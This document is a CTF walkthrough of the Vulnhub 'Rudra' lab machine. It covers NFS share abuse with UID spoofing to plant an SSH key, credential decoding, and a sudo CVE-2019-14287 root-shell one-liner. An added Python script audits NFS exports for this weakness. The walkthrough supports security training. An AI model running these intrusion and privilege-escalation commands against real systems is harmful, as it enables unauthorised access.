Vulnhub Rudra Walkthrough

Rudra Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.19 -vv

The dirb scan gave these results:

As the nmap output shows, the host must be exporting an NFS share, which we can list with showmount -e 192.168.1.19

OK, now we are going to access this share by entering the following commands:

mkdir shivay

mount -t nfs 192.168.1.19:/home/shivay ~/shivay

mount -t nfs -o vers=3 192.168.1.4:/home/shivay ~/shivay

ls -ld shivay

                drwxr-xr-x 2 1002 1002 4096 Oct 21 16:54 shivay

groupadd --gid 2008 shivay_group

useradd --uid 2008 --groups shivay_group shivay_user

OK, I don’t believe this file is useful. Now let’s create an .ssh folder and copy our public key into it so we are able to SSH to the host. We create .ssh inside the shivay folder and generate new keys:

mkdir shivay/.ssh

cp ~/.ssh/id_rsa.pub shivay/.ssh/authorized_keys

ssh shivay@192.168.1.19

and we got in … nice.
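
A server-side check for the weakness used in the steps above, as an added example that is not part of the original walkthrough: the mount is writable because an AUTH_SYS (sec=sys) NFS export trusts the UID the client sends, and root_squash only remaps UID 0, so only all_squash or a Kerberos flavor stops a matching local UID. The function name audit_exports and the exports content are assumptions; the sample is constructed, since the VM's real /etc/exports is not shown on the page.

```python
import re

# Constructed sample; the Rudra VM's real /etc/exports is not shown on the page.
SAMPLE_EXPORTS = """\
# path          client(options)
/home/shivay    *(rw,sync,root_squash)
/srv/pub        192.168.1.0/24(ro,all_squash)
/srv/backup     backup01(rw,sec=krb5p)
/srv/scratch    *(rw,all_squash,anonuid=65534)
/srv/build      10.0.0.5(rw,no_root_squash)
"""

# One client token: optional host followed by optional "(opt,opt,...)".
CLIENT_RE = re.compile(r"^(?P<host>[^()\s]*)(?:\((?P<opts>[^)]*)\))?$")


def audit_exports(text):
    """Return (path, client, wildcard) for each writable export that trusts
    the UID/GID sent by the client (AUTH_SYS without all_squash)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            m = CLIENT_RE.match(client)
            if m is None:
                continue  # token this simple parser does not understand
            host = m.group("host") or "*"  # "(rw)" with no host means any client
            opts = set(filter(None, (m.group("opts") or "").split(",")))
            # sec= lists the accepted security flavors; the default is sys.
            flavors = next((o[4:].split(":") for o in opts if o.startswith("sec=")), ["sys"])
            writable = "rw" in opts  # the default is ro
            trusts_uid = "sys" in flavors and "all_squash" not in opts
            if writable and trusts_uid:
                findings.append((path, host, "*" in host or "?" in host))
    return findings


if __name__ == "__main__":
    for path, host, wildcard in audit_exports(SAMPLE_EXPORTS):
        scope = "any client" if wildcard else host
        print(f"{path}: rw for {scope}, client-supplied UIDs accepted")
```

Note that the /home/shivay line is flagged even though it sets root_squash: that option does nothing for a non-root UID such as the 1002 seen in the ls -ld output.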

Now running the LinEnum.sh script gave us this:

So we connect to mysql with: mysql -u root

OK, we change directory to /media

OK, now we have a file named hints; opening it, we find a link to an article. There is another file named creds; viewing it, we see some emojis. Reading the article and following its steps:

First copy the contents of the file creds to a new file on your machine and save it

Download the git file from the article and then run it.

Select 2) Decloakify a File (locate the file you saved before) and then Enter cipher #: 20

Your file will be saved under a new name. View it, and there is a new username and password that we can use to log in with ssh.

The file content: mahakaal:kalbhairav

It took me a while and a while to figure it out, till I found a link to this exploit:

https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability

sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u
